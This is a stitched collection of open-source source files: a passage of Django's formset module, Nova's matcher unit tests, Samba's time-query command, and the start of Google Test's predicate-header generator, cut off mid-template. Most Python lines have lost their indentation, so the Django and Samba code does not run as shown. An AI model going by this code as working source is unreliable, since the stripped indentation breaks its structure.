from django.utils.safestring import mark_safe
from django.utils import six
from django.utils.six.moves import xrange
from django.utils.translation import ungettext, ugettext as _
__all__ = ('BaseFormSet', 'formset_factory', 'all_valid')
# special field names
TOTAL_FORM_COUNT = 'TOTAL_FORMS'
INITIAL_FORM_COUNT = 'INITIAL_FORMS'
MIN_NUM_FORM_COUNT = 'MIN_NUM_FORMS'
MAX_NUM_FORM_COUNT = 'MAX_NUM_FORMS'
ORDERING_FIELD_NAME = 'ORDER'
DELETION_FIELD_NAME = 'DELETE'
# default minimum number of forms in a formset
DEFAULT_MIN_NUM = 0
# default maximum number of forms in a formset, to prevent memory exhaustion
DEFAULT_MAX_NUM = 1000
class ManagementForm(Form):
"""
``ManagementForm`` is used to keep track of how many form instances
are displayed on the page. If adding new forms via javascript, you should
increment the count field of this form as well.
"""
def __init__(self, *args, **kwargs):
self.base_fields[TOTAL_FORM_COUNT] = IntegerField(widget=HiddenInput)
self.base_fields[INITIAL_FORM_COUNT] = IntegerField(widget=HiddenInput)
# MIN_NUM_FORM_COUNT and MAX_NUM_FORM_COUNT are output with the rest of
# the management form, but only for the convenience of client-side
# code. The POST value of them returned from the client is not checked.
self.base_fields[MIN_NUM_FORM_COUNT] = IntegerField(required=False, widget=HiddenInput)
self.base_fields[MAX_NUM_FORM_COUNT] = IntegerField(required=False, widget=HiddenInput)
super(ManagementForm, self).__init__(*args, **kwargs)
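# For a formset using the default prefix ('form'), the management form data
# arrives in POST under keys such as (illustrative values):
#
#   form-TOTAL_FORMS=3
#   form-INITIAL_FORMS=1
#   form-MIN_NUM_FORMS=0
#   form-MAX_NUM_FORMS=1000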
@python_2_unicode_compatible
class BaseFormSet(object):
"""
A collection of instances of the same Form class.
"""
def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,
initial=None, error_class=ErrorList):
self.is_bound = data is not None or files is not None
self.prefix = prefix or self.get_default_prefix()
self.auto_id = auto_id
self.data = data or {}
self.files = files or {}
self.initial = initial
self.error_class = error_class
self._errors = None
self._non_form_errors = None
def __str__(self):
return self.as_table()
def __iter__(self):
"""Yields the forms in the order they should be rendered"""
return iter(self.forms)
def __getitem__(self, index):
"""Returns the form at the given index, based on the rendering order"""
return self.forms[index]
def __len__(self):
return len(self.forms)
def __bool__(self):
"""All formsets have a management form which is not included in the length"""
return True
def __nonzero__(self): # Python 2 compatibility
return type(self).__bool__(self)
@property
def management_form(self):
"""Returns the ManagementForm instance for this FormSet."""
if self.is_bound:
form = ManagementForm(self.data, auto_id=self.auto_id, prefix=self.prefix)
if not form.is_valid():
raise ValidationError(
_('ManagementForm data is missing or has been tampered with'),
code='missing_management_form',
)
else:
form = ManagementForm(auto_id=self.auto_id, prefix=self.prefix, initial={
TOTAL_FORM_COUNT: self.total_form_count(),
INITIAL_FORM_COUNT: self.initial_form_count(),
MIN_NUM_FORM_COUNT: self.min_num,
MAX_NUM_FORM_COUNT: self.max_num
})
return form
def total_form_count(self):
"""Returns the total number of forms in this FormSet."""
if self.is_bound:
# return absolute_max if it is lower than the actual total form
# count in the data; this is DoS protection to prevent clients
# from forcing the server to instantiate arbitrary numbers of
# forms
return min(self.management_form.cleaned_data[TOTAL_FORM_COUNT], self.absolute_max)
else:
initial_forms = self.initial_form_count()
total_forms = max(initial_forms, self.min_num) + self.extra
# Allow all existing related objects/inlines to be displayed,
# but don't allow extra beyond max_num.
if initial_forms > self.max_num >= 0:
total_forms = initial_forms
elif total_forms > self.max_num >= 0:
total_forms = self.max_num
return total_forms
def initial_form_count(self):
"""Returns the number of forms that are required in this FormSet."""
if self.is_bound:
return self.management_form.cleaned_data[INITIAL_FORM_COUNT]
else:
# Use the length of the initial data if it's there, 0 otherwise.
initial_forms = len(self.initial) if self.initial else 0
return initial_forms
@cached_property
def forms(self):
"""
Instantiate forms at first property access.
"""
# DoS protection is included in total_form_count()
forms = [self._construct_form(i) for i in xrange(self.total_form_count())]
return forms
def _construct_form(self, i, **kwargs):
"""
Instantiates and returns the i-th form instance in a formset.
"""
defaults = {
'auto_id': self.auto_id,
'prefix': self.add_prefix(i),
'error_class': self.error_class,
}
if self.is_bound:
defaults['data'] = self.data
defaults['files'] = self.files
if self.initial and 'initial' not in kwargs:
try:
defaults['initial'] = self.initial[i]
except IndexError:
pass
# Allow extra forms to be empty, unless they're part of
# the minimum forms.
if i >= self.initial_form_count() and i >= self.min_num:
defaults['empty_permitted'] = True
defaults.update(kwargs)
form = self.form(**defaults)
self.add_fields(form, i)
return form
@property
def initial_forms(self):
"""Return a list of all the initial forms in this formset."""
return self.forms[:self.initial_form_count()]
@property
def extra_forms(self):
"""Return a list of all the extra forms in this formset."""
return self.forms[self.initial_form_count():]
@property
def empty_form(self):
form = self.form(
auto_id=self.auto_id,
prefix=self.add_prefix('__prefix__'),
empty_permitted=True,
)
self.add_fields(form, None)
return form
@property
def cleaned_data(self):
"""
Returns a list of form.cleaned_data dicts for every form in self.forms.
"""
if not self.is_valid():
raise AttributeError("'%s' object has no attribute 'cleaned_data'" % self.__class__.__name__)
return [form.cleaned_data for form in self.forms]
@property
def deleted_forms(self):
"""
Returns a list of forms that have been marked for deletion.
"""
if not self.is_valid() or not self.can_delete:
return []
# construct _deleted_form_indexes which is just a list of form indexes
# that have had their deletion widget set to True
if not hasattr(self, '_deleted_form_indexes'):
self._deleted_form_indexes = []
for i in range(0, self.total_form_count()):
form = self.forms[i]
# if this is an extra form and hasn't changed, don't consider it
if i >= self.initial_form_count() and not form.has_changed():
continue
if self._should_delete_form(form):
self._deleted_form_indexes.append(i)
return [self.forms[i] for i in self._deleted_form_indexes]
@property
def ordered_forms(self):
"""
Returns a list of form in the order specified by the incoming data.
Raises an AttributeError if ordering is not allowed.
"""
if not self.is_valid() or not self.can_order:
raise AttributeError("'%s' object has no attribute 'ordered_forms'" % self.__class__.__name__)
# Construct _ordering, which is a list of (form_index, order_field_value)
# tuples. After constructing this list, we'll sort it by order_field_value
# so we have a way to get to the form indexes in the order specified
# by the form data.
if not hasattr(self, '_ordering'):
self._ordering = []
for i in range(0, self.total_form_count()):
form = self.forms[i]
# if this is an extra form and hasn't changed, don't consider it
if i >= self.initial_form_count() and not form.has_changed():
continue
# don't add data marked for deletion to self.ordered_data
if self.can_delete and self._should_delete_form(form):
continue
self._ordering.append((i, form.cleaned_data[ORDERING_FIELD_NAME]))
# After we're done populating self._ordering, sort it.
# A sort function to order things numerically ascending, but
# None should be sorted below anything else. Allowing None as
# a comparison value makes it so we can leave ordering fields
# blank.
def compare_ordering_key(k):
if k[1] is None:
return (1, 0) # +infinity, larger than any number
return (0, k[1])
self._ordering.sort(key=compare_ordering_key)
# Return a list of form.cleaned_data dicts in the order specified by
# the form data.
return [self.forms[i[0]] for i in self._ordering]
@classmethod
def get_default_prefix(cls):
return 'form'
def non_form_errors(self):
"""
Returns an ErrorList of errors that aren't associated with a particular
form -- i.e., from formset.clean(). Returns an empty ErrorList if there
are none.
"""
if self._non_form_errors is None:
self.full_clean()
return self._non_form_errors
@property
def errors(self):
"""
Returns a list of form.errors for every form in self.forms.
"""
if self._errors is None:
self.full_clean()
return self._errors
def total_error_count(self):
"""
Returns the number of errors across all forms in the formset.
"""
return len(self.non_form_errors()) +\
sum(len(form_errors) for form_errors in self.errors)
def _should_delete_form(self, form):
"""
Returns whether or not the form was marked for deletion.
"""
return form.cleaned_data.get(DELETION_FIELD_NAME, False)
def is_valid(self):
"""
Returns True if every form in self.forms is valid.
"""
if not self.is_bound:
return False
# We loop over every form.errors here rather than short circuiting on the
# first failure to make sure validation gets triggered for every form.
forms_valid = True
# This triggers a full clean.
self.errors
for i in range(0, self.total_form_count()):
form = self.forms[i]
if self.can_delete:
if self._should_delete_form(form):
# This form is going to be deleted so any of its errors
# should not cause the entire formset to be invalid.
continue
forms_valid &= form.is_valid()
return forms_valid and not bool(self.non_form_errors())
def full_clean(self):
"""
Cleans all of self.data and populates self._errors and
self._non_form_errors.
"""
self._errors = []
self._non_form_errors = self.error_class()
if not self.is_bound: # Stop further processing.
return
for i in range(0, self.total_form_count()):
form = self.forms[i]
self._errors.append(form.errors)
try:
if (self.validate_max and
self.total_form_count() - len(self.deleted_forms) > self.max_num) or \
self.management_form.cleaned_data[TOTAL_FORM_COUNT] > self.absolute_max:
raise ValidationError(ungettext(
"Please submit %d or fewer forms.",
"Please submit %d or fewer forms.", self.max_num) % self.max_num,
code='too_many_forms',
)
if (self.validate_min and
self.total_form_count() - len(self.deleted_forms) < self.min_num):
raise ValidationError(ungettext(
"Please submit %d or more forms.",
"Please submit %d or more forms.", self.min_num) % self.min_num,
code='too_few_forms')
# Give self.clean() a chance to do cross-form validation.
self.clean()
except ValidationError as e:
self._non_form_errors = self.error_class(e.error_list)
def clean(self):
"""
Hook for doing any extra formset-wide cleaning after Form.clean() has
been called on every form. Any ValidationError raised by this method
will not be associated with a particular form; it will be accessible
via formset.non_form_errors()
"""
pass
def has_changed(self):
"""
Returns true if data in any form differs from initial.
"""
return any(form.has_changed() for form in self)
def add_fields(self, form, index):
"""A hook for adding extra fields on to each form instance."""
if self.can_order:
# Only pre-fill the ordering field for initial forms.
if index is not None and index < self.initial_form_count():
form.fields[ORDERING_FIELD_NAME] = IntegerField(label=_('Order'), initial=index + 1, required=False)
else:
form.fields[ORDERING_FIELD_NAME] = IntegerField(label=_('Order'), required=False)
if self.can_delete:
form.fields[DELETION_FIELD_NAME] = BooleanField(label=_('Delete'), required=False)
def add_prefix(self, index):
return '%s-%s' % (self.prefix, index)
def is_multipart(self):
"""
Returns True if the formset needs to be multipart, i.e. it
has FileInput. Otherwise, False.
"""
if self.forms:
return self.forms[0].is_multipart()
else:
return self.empty_form.is_multipart()
@property
def media(self):
# All the forms on a FormSet are the same, so you only need to
# interrogate the first form for media.
if self.forms:
return self.forms[0].media
else:
return self.empty_form.media
def as_table(self):
"Returns this formset rendered as HTML <tr>s -- excluding the <table></table>."
# XXX: there is no semantic division between forms here, there
# probably should be. It might make sense to render each form as a
# table row with each field as a td.
forms = ' '.join(form.as_table() for form in self)
return mark_safe('\n'.join([six.text_type(self.management_form), forms]))
def as_p(self):
"Returns this formset rendered as HTML <p>s."
forms = ' '.join(form.as_p() for form in self)
return mark_safe('\n'.join([six.text_type(self.management_form), forms]))
def as_ul(self):
"Returns this formset rendered as HTML <li>s."
forms = ' '.join(form.as_ul() for form in self)
return mark_safe('\n'.join([six.text_type(self.management_form), forms]))
def formset_factory(form, formset=BaseFormSet, extra=1, can_order=False,
can_delete=False, max_num=None, validate_max=False,
min_num=None, validate_min=False):
"""Return a FormSet for the given form class."""
if min_num is None:
min_num = DEFAULT_MIN_NUM
if max_num is None:
max_num = DEFAULT_MAX_NUM
# hard limit on forms instantiated, to prevent memory-exhaustion attacks
# limit is simply max_num + DEFAULT_MAX_NUM (which is 2*DEFAULT_MAX_NUM
# if max_num is None in the first place)
absolute_max = max_num + DEFAULT_MAX_NUM
attrs = {'form': form, 'extra': extra,
'can_order': can_order, 'can_delete': can_delete,
'min_num': min_num, 'max_num': max_num,
'absolute_max': absolute_max, 'validate_min': validate_min,
'validate_max': validate_max}
return type(form.__name__ + str('FormSet'), (formset,), attrs)
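# Example usage (illustrative; ``ArticleForm`` and ``process`` are
# hypothetical):
#
#   ArticleFormSet = formset_factory(ArticleForm, extra=2, can_delete=True)
#   formset = ArticleFormSet(request.POST, request.FILES)
#   if formset.is_valid():
#       for form in formset:
#           process(form.cleaned_data)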
def all_valid(formsets):
"""Returns true if every formset in formsets is valid."""
valid = True
for formset in formsets:
if not formset.is_valid():
valid = False
return valid
| apache-2.0 |
bgxavier/nova | nova/tests/unit/test_matchers.py | 66 | 14015 | # Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from collections import OrderedDict
import testtools
from testtools.tests.matchers import helpers
from nova.tests.unit import matchers
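# Each test case below follows the testtools TestMatchersInterface contract:
# every entry in matches_matches must satisfy matches_matcher, every entry
# in matches_mismatches must not, and str_examples/describe_examples pin
# down the matcher's __str__ output and its mismatch descriptions.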
class TestDictMatches(testtools.TestCase, helpers.TestMatchersInterface):
matches_dict = OrderedDict(sorted({'foo': 'bar', 'baz': 'DONTCARE',
'cat': {'tabby': True, 'fluffy': False}}.items()))
matches_matcher = matchers.DictMatches(
matches_dict
)
matches_matches = [
{'foo': 'bar', 'baz': 'noox', 'cat': {'tabby': True, 'fluffy': False}},
{'foo': 'bar', 'baz': 'quux', 'cat': {'tabby': True, 'fluffy': False}},
]
matches_mismatches = [
{},
{'foo': 'bar', 'baz': 'qux'},
{'foo': 'bop', 'baz': 'qux',
'cat': {'tabby': True, 'fluffy': False}},
{'foo': 'bar', 'baz': 'quux',
'cat': {'tabby': True, 'fluffy': True}},
{'foo': 'bar', 'cat': {'tabby': True, 'fluffy': False}},
]
str_examples = [
("DictMatches({0})".format(matches_dict),
matches_matcher),
]
describe_examples = [
("Keys in d1 and not d2: {0}. Keys in d2 and not d1: []"
.format(str(sorted(matches_dict.keys()))), {}, matches_matcher),
("Dictionaries do not match at fluffy. d1: False d2: True",
{'foo': 'bar', 'baz': 'quux',
'cat': {'tabby': True, 'fluffy': True}}, matches_matcher),
("Dictionaries do not match at foo. d1: bar d2: bop",
{'foo': 'bop', 'baz': 'quux',
'cat': {'tabby': True, 'fluffy': False}}, matches_matcher),
]
class TestDictListMatches(testtools.TestCase, helpers.TestMatchersInterface):
matches_matcher = matchers.DictListMatches(
[{'foo': 'bar', 'baz': 'DONTCARE',
'cat': {'tabby': True, 'fluffy': False}},
{'dog': 'yorkie'},
])
matches_matches = [
[{'foo': 'bar', 'baz': 'qoox',
'cat': {'tabby': True, 'fluffy': False}},
{'dog': 'yorkie'}],
[{'foo': 'bar', 'baz': False,
'cat': {'tabby': True, 'fluffy': False}},
{'dog': 'yorkie'}],
]
matches_mismatches = [
[],
{},
[{'foo': 'bar', 'baz': 'qoox',
'cat': {'tabby': True, 'fluffy': True}},
{'dog': 'yorkie'}],
[{'foo': 'bar', 'baz': False,
'cat': {'tabby': True, 'fluffy': False}},
{'cat': 'yorkie'}],
[{'foo': 'bop', 'baz': False,
'cat': {'tabby': True, 'fluffy': False}},
{'dog': 'yorkie'}],
]
str_examples = [
("DictListMatches([{'baz': 'DONTCARE', 'cat':"
" {'fluffy': False, 'tabby': True}, 'foo': 'bar'},\n"
" {'dog': 'yorkie'}])",
matches_matcher),
]
describe_examples = [
("Length mismatch: len(L1)=2 != len(L2)=0", {}, matches_matcher),
("Dictionaries do not match at fluffy. d1: True d2: False",
[{'foo': 'bar', 'baz': 'qoox',
'cat': {'tabby': True, 'fluffy': True}},
{'dog': 'yorkie'}],
matches_matcher),
]
class TestIsSubDictOf(testtools.TestCase, helpers.TestMatchersInterface):
matches_matcher = matchers.IsSubDictOf(
OrderedDict(sorted({'foo': 'bar', 'baz': 'DONTCARE',
'cat': {'tabby': True, 'fluffy': False}}.items()))
)
matches_matches = [
{'foo': 'bar', 'baz': 'noox', 'cat': {'tabby': True, 'fluffy': False}},
{'foo': 'bar', 'baz': 'quux'}
]
matches_mismatches = [
{'foo': 'bop', 'baz': 'qux',
'cat': {'tabby': True, 'fluffy': False}},
{'foo': 'bar', 'baz': 'quux',
'cat': {'tabby': True, 'fluffy': True}},
{'foo': 'bar', 'cat': {'tabby': True, 'fluffy': False}, 'dog': None},
]
str_examples = [
("IsSubDictOf({0})".format(
str(OrderedDict(sorted({'foo': 'bar', 'baz': 'DONTCARE',
'cat': {'tabby': True,
'fluffy': False}}.items())))),
matches_matcher),
]
describe_examples = [
("Dictionaries do not match at fluffy. d1: False d2: True",
{'foo': 'bar', 'baz': 'quux',
'cat': {'tabby': True, 'fluffy': True}}, matches_matcher),
("Dictionaries do not match at foo. d1: bar d2: bop",
{'foo': 'bop', 'baz': 'quux',
'cat': {'tabby': True, 'fluffy': False}}, matches_matcher),
]
class TestXMLMatches(testtools.TestCase, helpers.TestMatchersInterface):
matches_matcher = matchers.XMLMatches("""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="DONTCARE"/>
<children>
<!--This is a comment-->
<child1>child 1</child1>
<child2>child 2</child2>
<child3>DONTCARE</child3>
<?spam processing instruction?>
</children>
</root>""", allow_mixed_nodes=False)
matches_matches = ["""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key2="spam" key1="spam"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="quux"/>
<children><child1>child 1</child1>
<child2>child 2</child2>
<child3>blah</child3>
</children>
</root>""",
]
matches_mismatches = ["""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>mismatch text</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key3="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="quux" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child4>child 4</child4>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
</children>
</root>""",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
<child4>child 4</child4>
</children>
</root>""",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="DONTCARE"/>
<children>
<!--This is a comment-->
<child2>child 2</child2>
<child1>child 1</child1>
<child3>DONTCARE</child3>
<?spam processing instruction?>
</children>
</root>""",
"""<?xml version="1.1"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="DONTCARE"/>
<children>
<!--This is a comment-->
<child1>child 1</child1>
<child2>child 2</child2>
<child3>DONTCARE</child3>
<?spam processing instruction?>
</children>
</root>""",
]
str_examples = [
("XMLMatches('<?xml version=\"1.0\"?>\\n"
"<root>\\n"
" <text>some text here</text>\\n"
" <text>some other text here</text>\\n"
" <attrs key1=\"spam\" key2=\"DONTCARE\"/>\\n"
" <children>\\n"
" <!--This is a comment-->\\n"
" <child1>child 1</child1>\\n"
" <child2>child 2</child2>\\n"
" <child3>DONTCARE</child3>\\n"
" <?spam processing instruction?>\\n"
" </children>\\n"
"</root>')", matches_matcher),
]
describe_examples = [
("/root/text[1]: XML text value mismatch: expected text value: "
"['some other text here']; actual value: ['mismatch text']",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>mismatch text</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""", matches_matcher),
("/root/attrs[2]: XML attributes mismatch: keys only in expected: "
"key2; keys only in actual: key3",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key3="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""", matches_matcher),
("/root/attrs[2]: XML attribute value mismatch: expected value of "
"attribute key1: 'spam'; actual value: 'quux'",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="quux" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""", matches_matcher),
("/root/children[3]: XML tag mismatch at index 1: expected tag "
"<child2>; actual tag <child4>",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child4>child 4</child4>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""", matches_matcher),
("/root/children[3]: XML expected child element <child3> not "
"present at index 2",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
</children>
</root>""", matches_matcher),
("/root/children[3]: XML unexpected child element <child4> "
"present at index 3",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
<child4>child 4</child4>
</children>
</root>""", matches_matcher),
("/root/children[3]: XML tag mismatch at index 0: "
"expected tag <child1>; actual tag <child2>",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="quux"/>
<children>
<child2>child 2</child2>
<child1>child 1</child1>
<child3>child 3</child3>
</children>
</root>""", matches_matcher),
("/: XML information mismatch(version, encoding) "
"expected version 1.0, expected encoding UTF-8; "
"actual version 1.1, actual encoding UTF-8",
"""<?xml version="1.1"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="DONTCARE"/>
<children>
<!--This is a comment-->
<child1>child 1</child1>
<child2>child 2</child2>
<child3>DONTCARE</child3>
<?spam processing instruction?>
</children>
</root>""", matches_matcher),
]
class TestXMLMatchesUnorderedNodes(testtools.TestCase,
helpers.TestMatchersInterface):
matches_matcher = matchers.XMLMatches("""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>some other text here</text>
<attrs key1="spam" key2="DONTCARE"/>
<children>
<child3>DONTCARE</child3>
<!--This is a comment-->
<child2>child 2</child2>
<child1>child 1</child1>
<?spam processing instruction?>
</children>
</root>""", allow_mixed_nodes=True)
matches_matches = ["""<?xml version="1.0"?>
<root>
<text>some text here</text>
<attrs key2="spam" key1="spam"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
<text>some other text here</text>
</root>""",
]
matches_mismatches = ["""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>mismatch text</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""",
]
describe_examples = [
("/root: XML expected child element <text> not present at index 4",
"""<?xml version="1.0"?>
<root>
<text>some text here</text>
<text>mismatch text</text>
<attrs key1="spam" key2="quux"/>
<children>
<child1>child 1</child1>
<child2>child 2</child2>
<child3>child 3</child3>
</children>
</root>""", matches_matcher),
]
str_examples = []
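# Editor's note: minimal usage sketch (not part of the original suite) showing
# how these matchers are consumed in a testtools-style test; the expected and
# observed dicts below are hypothetical.
class ExampleMatcherUsage(testtools.TestCase):
    def test_dict_matches_ignores_dontcare_values(self):
        expected = {'name': 'vm-1', 'uuid': 'DONTCARE'}
        observed = {'name': 'vm-1', 'uuid': 'abc-123'}
        self.assertThat(observed, matchers.DictMatches(expected))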
| apache-2.0 |
urisimchoni/samba | python/samba/netcmd/nettime.py | 51 | 2007 | # time
#
# Copyright Jelmer Vernooij 2010 <jelmer@samba.org>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import samba.getopt as options
import common
from samba.net import Net
from samba.netcmd import (
Command,
)
class cmd_time(Command):
"""Retrieve the time on a server.
    This command returns the date and time of the Active Directory server specified on the command line. The server name specified may be the local server or a remote server. If the server name is not specified, the command returns the time and date of the local AD server.
Example1:
samba-tool time samdom.example.com
Example1 returns the date and time of the server samdom.example.com.
Example2:
samba-tool time
    Example2 returns the date and time of the local server.
"""
synopsis = "%prog [server-name] [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"credopts": options.CredentialsOptions,
"versionopts": options.VersionOptions,
}
takes_args = ["server_name?"]
def run(self, server_name=None, credopts=None, sambaopts=None,
versionopts=None):
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp, fallback_machine=True)
net = Net(creds, lp, server=credopts.ipaddress)
if server_name is None:
server_name = common.netcmd_dnsname(lp)
self.outf.write(net.time(server_name)+"\n")
| gpl-3.0 |
Endika/omim | 3party/protobuf/gtest/scripts/gen_gtest_pred_impl.py | 2538 | 21986 | #!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""gen_gtest_pred_impl.py v0.1
Generates the implementation of Google Test predicate assertions and
accompanying tests.
Usage:
gen_gtest_pred_impl.py MAX_ARITY
where MAX_ARITY is a positive integer.
The command generates the implementation of up-to MAX_ARITY-ary
predicate assertions, and writes it to file gtest_pred_impl.h in the
directory where the script is. It also generates the accompanying
unit test in file gtest_pred_impl_unittest.cc.
"""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import sys
import time
# Where this script is.
SCRIPT_DIR = os.path.dirname(sys.argv[0])
# Where to store the generated header.
HEADER = os.path.join(SCRIPT_DIR, '../include/gtest/gtest_pred_impl.h')
# Where to store the generated unit test.
UNIT_TEST = os.path.join(SCRIPT_DIR, '../test/gtest_pred_impl_unittest.cc')
def HeaderPreamble(n):
"""Returns the preamble for the header file.
Args:
n: the maximum arity of the predicate macros to be generated.
"""
# A map that defines the values used in the preamble template.
DEFS = {
'today' : time.strftime('%m/%d/%Y'),
'year' : time.strftime('%Y'),
'command' : '%s %s' % (os.path.basename(sys.argv[0]), n),
'n' : n
}
return (
"""// Copyright 2006, Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
// This file is AUTOMATICALLY GENERATED on %(today)s by command
// '%(command)s'. DO NOT EDIT BY HAND!
//
// Implements a family of generic predicate assertion macros.
#ifndef GTEST_INCLUDE_GTEST_GTEST_PRED_IMPL_H_
#define GTEST_INCLUDE_GTEST_GTEST_PRED_IMPL_H_
